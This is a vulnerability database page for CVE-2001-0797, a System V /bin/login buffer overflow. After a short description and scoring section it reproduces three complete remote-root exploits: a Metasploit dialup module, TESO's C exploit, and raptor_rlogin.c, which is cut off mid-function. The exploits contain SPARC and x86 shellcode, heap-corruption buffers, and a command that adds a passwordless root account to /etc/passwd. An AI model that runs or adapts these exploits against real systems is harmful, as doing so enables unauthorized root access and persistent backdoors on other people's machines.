CVE-2001-0797 : Detail

CVE-2001-0797

97.03%
V3
Network
2002-06-25 02h00 +00:00
2002-06-15 22h00 +00:00

CVE Description

Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin.

CVE Information

Metrics

Metrics  Score  Severity  CVSS Vector                 Source
V2       10               AV:N/AC:L/Au:N/C:C/I:C/A:C  [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 16928

Publication date : 2010-07-02 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: manyargs.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Dialup

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
			'Description'    => %q{
					This exploit connects to a system's modem over dialup and exploits
				a buffer overflow vulnerability in its System V derived /bin/login.
				The vulnerability is triggered by providing a large number of arguments.
			},
			'References'     =>
				[
					[ 'CVE', '2001-0797'],
					[ 'OSVDB', '690'],
					[ 'OSVDB', '691'],
					[ 'BID', '3681'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
				],
			'Version'        => '$Revision: 9669 $',
			'Author'         =>
				[
					'I)ruid',
				],
			'Arch'           => ARCH_TTY,
			'Platform'       => ['unix'],
			'License'        => MSF_LICENSE,
			'Payload'        =>
				{
					'Space'       => 3000,
					'BadChars'    => '',
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					[ 'Solaris 2.6 - 8 (SPARC)',
						{
							'Platform' => 'unix',
							'Ret'      => 0x00027184,
							# Solaris/SPARC special shellcode (courtesy of inode)
							# execve() + exit()
							'Shellcode' =>
								"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
								"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
								"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
								"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
							'NOP' => "\x90\x1b\x80\x0e",
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Dec 12 2001'))

		register_options(
			[
				# OptString.new('USER', [true, 'User to log in as', 'bin']),
			], self.class)
	end

	def buildbuf
		print_status("Targeting: #{self.target.name}")

		retaddr   = self.target.ret
		shellcode = self.target['Shellcode']
		nop       = self.target['NOP']
		user      = datastore['USER']
		command   = datastore['COMMAND'] + "\n"

		# prepare the evil buffer
		i = 0
		buf = ''

		# login name
		buf[i,4] = 'bin '
		i += 4

		# return address
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,1] = ' '
		i += 1

		# trigger the overflow
		(0...60).each {|c|
			buf[i,2] = 'a '
			i += 2
		}

		# padding
		buf[i,4] = ' BBB'
		i += 4

		# nop sled and shellcode
		(0...398).each {|c|
			buf[i,nop.size] = nop
			i += nop.size
		}
		shellcode.each_byte {|b|
			c = b.chr
			case 'c'
			when "\\"
				buf[i,2] = "\\\\"
				i += 2
			when "\xff", "\n", " ", "\t"
				buf[i,1]   = "\\"
				buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
				buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
				buf[i+3,1] = ( (b & 0007) + '0').chr
				i += 4
			else
				buf[i,1] = c
				i += 1
			end
		}
		# TODO: need to overwrite/skip the last byte of shellcode?
		#i -= 1

		# padding
		buf[i,4] = 'BBB '
		i += 4

		# pam_handle_t: minimal header
		buf[i,16] = 'CCCCCCCCCCCCCCCC'
		i += 16
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,4] = [0x01].pack('N')
		i += 4

		# pam_handle_t: NULL padding
		(0...52).each {|c|
			buf[i,4] = [0].pack('N')
			i += 4
		}

		# pam_handle_t: pameptr must be the 65th ptr
		buf[i,9] = "\x00\x00\x00 AAAA\n"
		i += 9

		return buf
	end

	def exploit
		buf = buildbuf

		print_status("Dialing Target")
		if not connect_dialup
			print_error("Exiting.")
			return
		end

		print_status("Waiting for login prompt")
		res = dialup_expect(/ogin:\s/i, 10)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Login prompt not found... Exiting.")
			disconnect_dialup
			return
		end

		# send the evil buffer, 256 chars at a time
		print_status("Sending evil buffer...")
		#puts Rex::Text.to_hex_dump(buf)
		len = buf.length
		p = 0
		while(len > 0) do
			i = len > 0x100 ? 0x100 : len
			#puts Rex::Text.to_hex_dump(buf[p,i])
			dialup_puts(buf[p,i])
			len -= i
			p += i
			# if len > 0
			#	puts Rex::Text.to_hex_dump("\x04")
			#	dialup_puts("\x04") if len > 0
			# end
			select(nil,nil,nil,0.5)
		end

		# wait for password prompt
		print_status("Waiting for password prompt")
		res = dialup_expect(/assword:/i, 30)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Password prompt received, waiting for shell")
		dialup_puts("pass\n")
		res = dialup_expect(/#\s/i, 20)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Shell not found.")
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Success!!!")
		handler
		disconnect_dialup
	end

end
Exploit Database EDB-ID : 346

Publication date : 2001-12-19 23h00 +00:00
Author : Teso
EDB Verified : Yes

/*
 * 7350963 - /bin/login remote root exploit SPARC/x86
 *
 * TESO CONFIDENTIAL - SOURCE MATERIALS
 *
 * This is unpublished proprietary source code of TESO Security.
 *
 * (C) COPYRIGHT TESO Security, 2001
 * All Rights Reserved
 *
 * bug found by scut 2001/12/20
 * thanks to halvar,scut,typo,random,edi,xdr.
 * special thanks to security.is.
 *
 * keep it private!
 * don't distribute!
 */

//#define X86_FULL_PACKAGE

#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>

void usage()
{
	printf("usage: ./7350963 ip_of_the_victim\n");
}

void dump_hex(char *str,char *data,int len)
{
	int i;

	if(str) {
		printf("\n=======%s:%d========\n",str,len);
	} else {
		printf("\n=======================\n");
	}
	for(i=0; i < len ;i++) {
		printf("x%.2x\n", (data[i]&0xff));
	}
	printf("\n-----------------------\n");
	for(i=0; i < len ;i++) {
		if(data[i]==0x00) {
			printf("|\n");
		} else {
			printf("%c\n",data[i]);
		}
	}
	printf("\n");
	fflush(stdout);
}

int send_data(int sock,const char *send_data,int send_len)
{
	int wc;
	int rc;
	char recv_buf[1000];

	if(send_data && send_len > 0) {
		wc=send(sock,send_data,send_len,0);
	}
	rc=recv(sock,recv_buf,sizeof(recv_buf),0);
	if(rc > 0) {
		dump_hex("recv",recv_buf,rc);
	}
	return rc;	/* number of bytes received (the original omitted the return) */
}

int main(int argc,char *argv[])
{
	int sock;
	struct sockaddr_in address;
	int i;

	char send_data_1[]= {
		0xff,0xfd,0x03,
		0xff,0xfb,0x18,
		0xff,0xfb,0x1f,
		0xff,0xfb,0x20,
		0xff,0xfb,0x21,
		0xff,0xfb,0x22,
		0xff,0xfb,0x27,
		0xff,0xfd,0x05,
		0xff,0xfb,0x23
	};
	char send_data_2[]= {
		0xff,0xfa,0x1f,0x00,0x50,0x00,0x18,
		0xff,0xf0,
		0xff,0xfc,0x24
	};
	char send_data_3[]= {
		0xff,0xfd,0x01,
		0xff,0xfc,0x01
	};
	char str_buffer[1024*30];
	int str_buffer_pos=0;
	char str_end[2]={0xd,0x0};

	char *env_str;
	int env_str_len;
	char env_1[4]={0xff,0xfa,0x18,0x00};
	char *terminal_name="xterm-debian";
	char env_2[6]={0xff,0xf0,0xff,0xfa,0x23,0x00};
	char *display="matter:0.0";
	char env_3[7]={0xff,0xf0,0xff,0xfa,0x27,0x00,0x00};
	char *display_var="DISPlAY";
	char display_delimiter[1]={0x01};
	char *display_value="matter:0.0";
	char *environ_str;
	int environ_str_len;
	int env_cur_pos=0;
	int env_num;
	char env_4[2]={0xff,0xf0};

	char exploit_buffer[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\r\n";
	char login_buffer[]=
		"ji1=A ji2=A ji3=A ji4=A ji5=A ji6=A ji7=A ji8=A ji9=Z ji10=z\\\r\n\
ji11=B ji12=A ji13=A ji14=b ji15=A ji16=A ji17=A ji18=A ji19=B ji20=b\\\r\n\
ji21=C ji22=A ji23=A ji24=c ji25=A ji26=A ji27=A ji28=A ji29=C ji30=c\\\r\n\
ji32=D ji32=A ji33=A ji34=d ji35=A ji36=A ji37=A ji38=A ji39=D ji40=d\\\r\n\
ji41=E ji42=A ji43=A ji44=e j";
	char realfree_edx[]={0x83,0x83,0x83,0x83};
	//0xdf9d6361 <realfree+81>: test $0x1,%dl   (to get past this check)
	char login_buffer1[]="=A j";
#ifdef X86_FULL_PACKAGE
	char t_delete_edi_plus_0x8[]={0x2f,0x80,0x06,0x08};
#else
	char t_delete_edi_plus_0x8[]={0x27,0x80,0x06,0x08};
#endif
	char t_delete_edi_plus_0xa[]="=A j";
	char t_delete_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
	char login_buffer1_0[]="=A ji48=A j ";
#ifdef X86_FULL_PACKAGE
	char t_delete_edi_plus_0x20[]={0xf0,0x55,0x6,0x08};
#else
	char t_delete_edi_plus_0x20[]={0xe8,0x55,0x6,0x08};
#endif
	char login_buffer1_1[]="=\\\r\n\
ji51=F ji52=A ji53=A ji54=f ji55=A ji56=A j=iheol i58=";
#ifdef X86_FULL_PACKAGE
	char t_delete2_param1[]={0x29,0x80,0x06,0x08};
#else
	char t_delete2_param1[]={0x21,0x80,0x06,0x08};
#endif
	char login_buffer1_2[]="6=8";
	char link_pos[]={0x97,0xff,0xff,0xff,0xff,0xff,0xff};	// the first A is -1
	char login_buffer2[]="A=AB";
	// 0x080654d4->0x080656ac at 0x000054d4: .got ALLOC LOAD DATA HAS_CONTENTS
	//0x80655a4 <_GLOBAL_OFFSET_TABLE_+208>: 0xdf9bd0b8 <strncpy>
	//(gdb) print/x 0x80655a4 - 0x20
	//$1 = 0x8065584
#ifdef X86_FULL_PACKAGE
	char t_delete2_edi_plus_0x8[]={0x90,0x55,0x06,0x08};	//strncpy-0x20,ecx
#else
	char t_delete2_edi_plus_0x8[]={0x84,0x55,0x06,0x08};	//strncpy-0x20,ecx
#endif
	char login_buffer2_0[]="GHIJ";
	char t_delete2_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
	char login_buffer2_1[]="OPQRSTUVWXYZ";
	//0x806810d <inputline+780>: 'A' <repeats 82 times>, "\n"
#ifdef X86_FULL_PACKAGE
	char t_delete2_edi_plus_0x20[]={0x06,0x81,0x06,0x08};	//shellcode,eax
#else
	char t_delete2_edi_plus_0x20[]={0xfe,0x80,0x06,0x08};	//shellcode,eax
#endif
	//0x8067e01 <inputline>: "heowahfoihewobhfoiewhiofhoewhofhoeiwhofwhofhiewwhfoiew
	char login_buffer2_2[]="efghijklmnopqrstuvwxyz0123456789A\\\r\n\
jk11=A jm21=C nj31=A jo41=A pi51=A jq61=A jr71=A js81=g jt91=A ju01=A jv11=A jw21=B jy";
	//31=A z";//4=A k2=A k3=A k";
#ifdef X86_FULL_PACKAGE
	//char strncpy_src[]={0xf9,0x3b,0x05,0x08};
	char strncpy_src[]={0x31,0x80,0x06,0x08};
#else
	char strncpy_src[]={0xf1,0x3b,0x05,0x08};
#endif
	char env_buffer[]="hi1=A hi2=A hi3=A hi";
	char pam_input_output_eax[]={0x48,0x8a,0x06,0x08};	//0x8068a48
	char env_buffer0[]="hi5=A hi6=A hi7=A hi";
#ifdef X86_FULL_PACKAGE
	char free_dest_buffer[]={0x31,0x80,0x06,0x08};
#else
	char free_dest_buffer[]={0x29,0x80,0x06,0x08};
#endif
	char env_buffer2[]="zi9=";
#ifdef X86_FULL_PACKAGE
	char free_dest_buffer2[]={0x31,0x80,0x06,0x08};
#else
	char free_dest_buffer2[]={0x29,0x80,0x06,0x08};
#endif
	char exp_buffer0[]="hello";
	char jmp_code[]={0xeb,0xc};
	char exp_buffer1[]="\\\r\nhhhhhhhhhhh";
	char shellcode[]= {
		0xeb,0x1d,
		0x5e,				/*popl %esi*/
		0x33,0xc0,			/*xorl %eax,%eax*/
		0x50,				/*pushl %eax - ,0x0*/
#ifdef X86_FULL_PACKAGE
		0x68,0x46,0x81,0x06,0x08,
		0x68,0x43,0x81,0x06,0x08,
		0x68,0x40,0x81,0x06,0x08,
		0x68,0x38,0x81,0x06,0x08,
#else
		0x68,0x3e,0x81,0x06,0x08,
		0x68,0x3b,0x81,0x06,0x08,
		0x68,0x38,0x81,0x06,0x08,
		0x68,0x30,0x81,0x06,0x08,
#endif
#ifdef X86_FULL_PACKAGE
		0xe8,0x25,0xa0,0xfe,0xff,0xff,	/*call execve: 0xfffe9fee*/
#else
		0xe8,0x2e,0xa0,0xfe,0xff,0xff,	/*call execve: 0xfffe9fee*/
#endif
		0xe8,0xde,0xff,0xff,0xff,0xff,0xff,0xff	/*call again*/
	};
	char exec_argv0[]="/bin/sh";
	char exec_argv1[]="sh";
	char exec_argv2[]="-c";
	char exec_argv3[]="/bin/echo met::463:1::/:/bin/sh>>/etc/passwd;";
	//"/bin/echo met::11652::::::>>/etc/shadow;";
	//"/bin/finger @210.111.69.137"; //211.59.123.155";
	char extra_buffer[]="hihihiifhewiohfiowehfiohweiofhiowehfoihefe\\\r\n";
#ifdef X86_FULL_PACKAGE
	char free_dest_buffer3[]={0x31,0x80,0x06,0x08};
#else
	char free_dest_buffer3[]={0x29,0x80,0x06,0x08};
#endif
	char env_buffer5[]="70=b \\\r\n\
hr371=b hs372=";
	char pam_input_output_eax2[]={0xf5,0x3b,0x05,0x08};
	char env_buffer5_0[]="473=";
	char pam_get_authtok_eax[]={0xf6,0x3b,0x05,0x08};	//0x8053bfa  (temporary workaround)
	char pam_get_data_esi[]={0xa8,0xb1,0x06,0x08};	//0x806b1a8

	display="";
	terminal_name="";

	if (argc < 2) {
		usage();
		exit(-1);
	}

	env_str_len= sizeof(env_1) + strlen(terminal_name) + sizeof(env_2)+strlen(display)
		+ sizeof(env_3) + strlen(display_var) + sizeof(display_delimiter)
		+ strlen(display_value) + sizeof(env_4);
	env_str=(char *)calloc(1,env_str_len);
	if(env_str) {
		env_cur_pos=0;
		memcpy(env_str+env_cur_pos,env_1,sizeof(env_1));
		env_cur_pos += sizeof(env_1);
		memcpy(env_str + env_cur_pos,terminal_name,strlen(terminal_name));
		env_cur_pos += strlen(terminal_name);
		memcpy(env_str + env_cur_pos,env_2,sizeof(env_2));
		env_cur_pos += sizeof(env_2);
		memcpy(env_str + env_cur_pos,display,strlen(display));
		env_cur_pos += strlen(display);
		memcpy(env_str + env_cur_pos,env_3,sizeof(env_3));
		env_cur_pos += sizeof(env_3);
		memcpy(env_str + env_cur_pos,display_var,strlen(display_var));
		env_cur_pos += strlen(display_var);
		memcpy(env_str + env_cur_pos,display_delimiter,sizeof(display_delimiter));
		env_cur_pos+=sizeof(display_delimiter);
		memcpy(env_str + env_cur_pos,display_value,strlen(display_value));
		env_cur_pos += strlen(display_value);
		memcpy(env_str + env_cur_pos,env_4,sizeof(env_4));
		env_cur_pos += sizeof(env_4);
	}

	/*socket operation*/
	sock=socket(AF_INET,SOCK_STREAM,0);
	if(sock < 0) {
		perror("socket");
		return -1;
	}
	address.sin_family=AF_INET;
	address.sin_port=htons(23);
	//inet_pton(AF_INET,argv[1],&address.sin_addr);	//on some system no inet_pton exists
	address.sin_addr.s_addr=inet_addr(argv[1]);
	if(connect(sock,(struct sockaddr *)&address,sizeof(address))<0) {
		perror("connect");
		return -1;
	}

	send_data(sock,NULL,0);
	send_data(sock,send_data_1,sizeof(send_data_1));
	send_data(sock,send_data_2,sizeof(send_data_2));
	//dump_hex("env",env_str,env_cur_pos);
	send_data(sock,env_str,env_cur_pos);
	free(env_str);
	send_data(sock,send_data_3,sizeof(send_data_3));

	str_buffer_pos=0;
	memcpy(str_buffer + str_buffer_pos,exploit_buffer,strlen(exploit_buffer));
	str_buffer_pos += strlen(exploit_buffer);
	strcpy(str_buffer + str_buffer_pos,login_buffer);
	str_buffer_pos += strlen(login_buffer);
	memcpy(str_buffer + str_buffer_pos,realfree_edx,sizeof(realfree_edx));
	str_buffer_pos += sizeof(realfree_edx);
	strcpy(str_buffer + str_buffer_pos,login_buffer1);
	str_buffer_pos += strlen(login_buffer1);
	memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x8,sizeof(t_delete_edi_plus_0x8));
	str_buffer_pos += sizeof(t_delete_edi_plus_0x8);
	memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0xa,strlen(t_delete_edi_plus_0xa));
	str_buffer_pos += strlen(t_delete_edi_plus_0xa);
	memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x10,sizeof(t_delete_edi_plus_0x10));
	str_buffer_pos += sizeof(t_delete_edi_plus_0x10);
	strcpy(str_buffer + str_buffer_pos,login_buffer1_0);
	str_buffer_pos += strlen(login_buffer1_0);
	memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x20,sizeof(t_delete_edi_plus_0x20));
	str_buffer_pos += sizeof(t_delete_edi_plus_0x20);
	strcpy(str_buffer + str_buffer_pos,login_buffer1_1);
	str_buffer_pos += strlen(login_buffer1_1);
	memcpy(str_buffer + str_buffer_pos,t_delete2_param1,sizeof(t_delete2_param1));
	str_buffer_pos += sizeof(t_delete2_param1);
	strcpy(str_buffer + str_buffer_pos,login_buffer1_2);
	str_buffer_pos += strlen(login_buffer1_2);
	memcpy(str_buffer + str_buffer_pos,link_pos,sizeof(link_pos));
	str_buffer_pos += sizeof(link_pos);
	strcpy(str_buffer + str_buffer_pos,login_buffer2);
	str_buffer_pos += strlen(login_buffer2);
	memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x8,sizeof(t_delete2_edi_plus_0x8));
	str_buffer_pos += sizeof(t_delete2_edi_plus_0x8);
	strcpy(str_buffer + str_buffer_pos,login_buffer2_0);
	str_buffer_pos += strlen(login_buffer2_0);
	memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x10,sizeof(t_delete2_edi_plus_0x10));
	str_buffer_pos += sizeof(t_delete2_edi_plus_0x10);
	strcpy(str_buffer + str_buffer_pos,login_buffer2_1);
	str_buffer_pos += strlen(login_buffer2_1);
	memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x20,sizeof(t_delete2_edi_plus_0x20));
	str_buffer_pos += sizeof(t_delete2_edi_plus_0x20);
	strcpy(str_buffer + str_buffer_pos,login_buffer2_2);
	str_buffer_pos += strlen(login_buffer2_2);
	memcpy(str_buffer + str_buffer_pos,strncpy_src,sizeof(strncpy_src));
	str_buffer_pos += sizeof(strncpy_src);
	memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer));
	str_buffer_pos += strlen(env_buffer);
	memcpy(str_buffer + str_buffer_pos,pam_input_output_eax,sizeof(pam_input_output_eax));
	str_buffer_pos += sizeof(pam_input_output_eax);
	memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer0));
	str_buffer_pos += strlen(env_buffer0);
	memcpy(str_buffer + str_buffer_pos,free_dest_buffer,sizeof(free_dest_buffer));
	str_buffer_pos += sizeof(free_dest_buffer);
	memcpy(str_buffer + str_buffer_pos,env_buffer2,strlen(env_buffer2));
	str_buffer_pos += strlen(env_buffer2);
	memcpy(str_buffer + str_buffer_pos,free_dest_buffer2,sizeof(free_dest_buffer2));
	str_buffer_pos += sizeof(free_dest_buffer2);
	strcpy(str_buffer + str_buffer_pos,exp_buffer0);
	str_buffer_pos += strlen(exp_buffer0);
	memcpy(str_buffer + str_buffer_pos,jmp_code,sizeof(jmp_code));
	str_buffer_pos += sizeof(jmp_code);
	strcpy(str_buffer + str_buffer_pos,exp_buffer1);
	str_buffer_pos += strlen(exp_buffer1);
	memcpy(str_buffer + str_buffer_pos,shellcode,sizeof(shellcode));
	str_buffer_pos += sizeof(shellcode);
	strcpy(str_buffer + str_buffer_pos,exec_argv0);
	str_buffer_pos += strlen(exec_argv0)+1;
	strcpy(str_buffer + str_buffer_pos,exec_argv1);
	str_buffer_pos += strlen(exec_argv1)+1;
	strcpy(str_buffer + str_buffer_pos,exec_argv2);
	str_buffer_pos += strlen(exec_argv2)+1;
	strcpy(str_buffer + str_buffer_pos,exec_argv3);
	str_buffer_pos += strlen(exec_argv3)+1;
	memcpy(str_buffer + str_buffer_pos,str_end,strlen(str_end));
	str_buffer_pos += strlen(str_end);

	{
		char buf[100];
		fgets(buf,100,stdin);
	}
	printf("sending login!\n");
	fflush(stdout);
	send_data(sock,str_buffer,str_buffer_pos);
	send_data(sock,NULL,0);
	printf("\n\n\npress return to send password\n...");
	{
		char buf[100];
		fgets(buf,100,stdin);
	}
	send_data(sock,str_buffer,strlen(str_buffer)+1);
	printf("\n\n\nwaiting for the realfree & t_delete to be called!\n...\n\n");
	fflush(stdout);
	sleep(30);
	return 42;
}

// milw0rm.com [2001-12-20]
Exploit Database EDB-ID : 716

Publication date : 2004-12-23 23h00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

/*
 * $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
 *
 * raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8
 * Copyright (c) 2004 Marco Ivaldi <[email protected]>
 *
 * Buffer overflow in login in various System V based operating systems
 * allows remote attackers to execute arbitrary commands via a large number
 * of arguments through services such as telnet and rlogin (CVE-2001-0797).
 *
 * Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004
 *
 * This remote root exploit uses the (old) System V based /bin/login
 * vulnerability via the rlogin attack vector, returning into the .bss
 * section to effectively bypass the non-executable stack protection
 * (noexec_user_stack=1 in /etc/system).
 *
 * Many thanks to scut <[email protected]> (0dd) for his elite pam_handle_t
 * technique (see 7350logout.c), also thanks to inode <[email protected]>.
 *
 * Usage (must be root):
 * # gcc raptor_rlogin.c -o raptor_rlogin -Wall
 * [on solaris: gcc raptor_rlogin.c -o raptor_rlogin -Wall -lxnet]
 * # ./raptor_rlogin -h 192.168.0.50
 * [...]
 * # id;uname -a;uptime;
 * uid=0(root) gid=0(root)
 * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 * 7:45pm up 12 day(s), 18:42, 1 user, load average: 0.00, 0.00, 0.01
 * #
 *
 * Vulnerable platforms (SPARC):
 * Solaris 2.5.1 without patch 106160-02 [untested]
 * Solaris 2.6 without patch 105665-04 [untested]
 * Solaris 7 without patch 112300-01 [untested]
 * Solaris 8 without patch 111085-02 [tested]
 */

#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define INFO1	"raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8"
#define INFO2	"Copyright (c) 2004 Marco Ivaldi <[email protected]>"

#define BUFSIZE	3000			// max size of the evil buffer
#define RETADDR	0x27184			// retaddr, should be reliable
#define TIMEOUT	10			// net_read() default timeout
#define CMD	"id;uname -a;uptime;\n"	// executed upon exploitation

char sc[] = /* Solaris/SPARC special shellcode (courtesy of inode) */
/* execve() + exit() */
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4"
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08";

char sparc_nop[] = /* Solaris/SPARC special nop (xor %sp, %sp, %o0) */
"\x90\x1b\x80\x0e";

/* prototypes */
int exploit_addchar(unsigned char *ww, unsigned char wc);
void fatalerr(char *func, char *error, int fd);
int net_connect(char *host, int port, int timeout);
int net_read(int fd, char *buf, int size, int timeout);
int net_resolve(char *host);
int sc_copy(unsigned char *buf, char *str, long len);
void set_val(char *buf, int pos, int val);
void shell(int fd);
void usage(char *progname);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], *p = buf;
	char	c, *host = NULL, term[] = "vt100/9600";
	int	fd, i, found, len;
	int	timeout = TIMEOUT, debug = 0;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* parse command line */
	if (argc < 2)
		usage(argv[0]);

	while ((c = getopt(argc, argv, "dh:t:")) != EOF)
		switch(c) {
			case 'h':
				host = optarg;
				break;
			case 't':
				timeout = atoi(optarg);
				break;
			case 'd':
				debug = 1;
				break;
			default:
				usage(argv[0]);
		}

	if (!host)
		usage(argv[0]);

	/* connect to the target host */
	fd = net_connect(host, 513, 10);
	fprintf(stderr, "# connected to remote host: %s\n", host);

	/* signal handling */
	signal(SIGPIPE, SIG_IGN);

	/* begin the rlogin session */
	memset(buf, 0, sizeof(buf));

	if (send(fd, buf, 1, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	if (net_read(fd, buf, sizeof(buf), timeout) < 0)
		fatalerr("error", "Timeout reached in rlogin session", fd);

	/* dummy rlogin authentication */
	memcpy(p, "foo", 3);			// local login name
	p += 4;
	memcpy(p, "bar", 3);			// remote login name
	p += 4;
	memcpy(p, term, sizeof(term));		// terminal type
	p += sizeof(term);

	fprintf(stderr, "# performing dummy rlogin authentication\n");

	if (send(fd, buf, p - buf, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for password prompt", fd);

	/* send a dummy password */
	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for login prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));
	fprintf(stderr, "# waiting for login prompt\n");

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "ogin: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for login prompt", fd);

	fprintf(stderr, "# returning into 0x%08x\n", RETADDR);

	/* for debugging purposes */
	if (debug) {
		printf("# debug: press enter to continue");
		scanf("%c", &c);
	}

	/* prepare the evil buffer */
	memset(buf, 0, sizeof(buf));
	p = buf;

	/* login name */
	memcpy(p, "foo ", 4);
	p += 4;

	/* return address (env) */
	set_val(p, 0, RETADDR);
	p += 4;
	memcpy(p, " ", 1);
	p++;

	/* trigger the overflow (env) */
	for (i = 0; i < 60; i++, p += 2)
		memcpy(p, "a ", 2);

	/* padding */
	memcpy(p, " BBB", 4);
	p += 4;

	/* nop sled and shellcode */
	for (i = 0; i < 398; i++, p += 4)
		memcpy(p, sparc_nop, 4);
	p += sc_copy(p, sc, sizeof(sc) - 1);

	/* padding */
	memcpy(p, "BBB ", 4);
	p += 4;

	/* pam_handle_t: minimal header */
	memcpy(p, "CCCCCCCCCCCCCCCC", 16);
	p += 16;
	set_val(p, 0, RETADDR);		// must be a valid address
	p += 4;
	set_val(p, 0, 0x01);
	p += 4;

	/* pam_handle_t: NULL padding */
	for (i = 0; i < 52; i++, p += 4)
		set_val(p, 0, 0x00);

	/* pam_handle_t: pameptr must be the 65th ptr */
	memcpy(p, "\x00\x00\x00 AAAA\n", 9);
	p += 9;

	/* send the evil buffer, 256 chars a time */
	len = p - buf;
	p = buf;

	while (len > 0) {
		fprintf(stderr, "#");
		i = len > 0x100 ? 0x100 : len;
		send(fd, p, i, 0);
		len -= i;
		p += i;
		if (len)
			send(fd, "\x04", 1, 0);
		usleep(500000);
	}
	fprintf(stderr, "\n");

	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));
	fprintf(stderr, "# evil buffer sent, waiting for password prompt\n");

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
